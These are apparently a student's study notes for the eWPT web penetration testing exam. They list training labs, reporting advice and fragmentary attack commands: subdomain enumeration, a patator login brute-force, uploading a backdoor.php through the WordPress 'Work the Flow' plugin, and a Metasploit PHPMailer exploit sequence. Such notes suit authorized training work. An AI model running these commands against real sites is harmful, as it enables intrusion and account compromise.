# eWPT Best resources for preparing:\ \ THM Nahamstore\ \ THM Web Fundamentals Path\ \ Portswigger's Web Security Academy\ \ HackerOne\ \ \ \ dnsenum -p 20 -s 100 --threads 5 cbs.com \ \ ./subbrute.py cbs.com whatweb site.com -v patator http\_fuzz url= method=POST \ body='username=FILE0\&password=FILE0' 0=/root/uesernames.txt follow=1 accept\_cookie=1 -x ignore:fgrep='Invalid Username' **Work the Flow exploit**\ \ ![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FapjUpFsux90AImeWNI6K%2Fimage.png?alt=media\&token=db6badf6-614c-42dd-991a-fa03e66dfad7)\ \ searchsploit work the flow worktheflow wordpress/wp-content/plugins wordpress/wp-content/plugins/work-the-flow-upload/README.txt searchsploit -m exploits/php/webapps/36640.txt curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" modify wp-login.php page code insertion of: (right at the top) ``` // ``` \
**Simple Php Shell**\
**Prevent Clickjacking** ``` ``` PhpMailer vuln:\ search phpmailer \ use exploit/multi/http/phpmailer\_arg\_injection \ set RHOST \ set WEB\_ROOT /var/www/html \ set LHOST ip \ exploit SWF Investigator soapexample.com/WS.php?wsdl
**Chaining vulns**\ chained 3 vulnerabilities (A path traversal, An SSRF in an external piece of software, and a post-authentication RCE) into a full pre-auth RCE **Report**\ Want the report to be: * Exhaustive * Clear * Good Looking * On-time * Adhering to goals Executive Summary --> Vulnerability Report --> Remediation Report\ \ **intro for Executive summary** The purpose of this assessment and report is to identify any web application issues that could affect ABC application and the web server hosting it, and to provide solutions to remedy these same issues.\ \ Use Graphs, Charts, stats and tables. Text should only be used to explain charts and give final estimation on the state of security.
![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2F3DvIH2mQwGacvZzd4eQ8%2Fimage.png?alt=media\&token=0e79fce5-02bf-4d07-999e-43d2939d84ef) **Resources to train:**\ \ **THM Web Fundamentals Path**\ [**https://portswigger.net/web-security/all-labs**](https://portswigger.net/web-security/all-labs)\ \
fuzzing:\ wfuzz -c -z file,/usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u "" -H "Host: FUZZ.nahamstore.thm" --hw 65 \ **Burp Suite Scanner - issue definitions with their ratings** ![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2F8QUUkv90vaSWNhVzy5qe%2F2022_06_23_15_41_14_Greenshot%20Burp%20scanner%20issue%20definition.jpg?alt=media\&token=b0d38e7f-5265-4e74-aeec-d7453f7d5cb5) **What can Burp help me with?**
![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2F98bp826I5DNZwebnJWg0%2F2022_06_23_15_52_15_Greenshot%20what%20can%20burp%20help%20me%20with.jpg?alt=media\&token=0035371a-0aa3-4e32-a18e-f3df2f8588c1) **DanielMiessler SecLists** {% embed url="" %} **when to Fuzz?**
![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FDAAXEg0k0VicOBWf0Djg%2F2022_06_23_16_30_20_Greenshot%20when%20to%20fuzz.jpg?alt=media\&token=0e7d5f7e-60b5-48b2-a787-41e3c6c085d1) * Do not rely on any automated tools * Take good notes * to have Knowledge about chaining vulnerabilities together - in order to achieve greater impact * test ALL the parameters, the attack point can be in the most unexpected place * Do not forget to include POC, CVSS scoring or Mitigation recommendations in the report\ \ \ Flash, CORS, and the NoSQL databases are not relevant for the exam. Of those three it's probably still a good idea to invest some time into CORS, and a little of NoSQL databases.